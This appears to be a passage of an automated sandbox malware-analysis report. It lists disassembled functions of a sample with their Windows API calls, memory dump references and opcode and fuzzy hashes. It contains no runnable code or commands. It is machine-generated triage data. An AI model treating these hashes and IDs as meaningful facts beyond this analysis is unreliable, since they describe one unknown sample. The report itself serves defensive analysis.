                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1658689577-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FB03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FormatMessage
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1306739567-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,01FC8000,0040A08C,00000000), ref: 004076B3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FB03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 734332943-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CharPrev
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 122130370-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
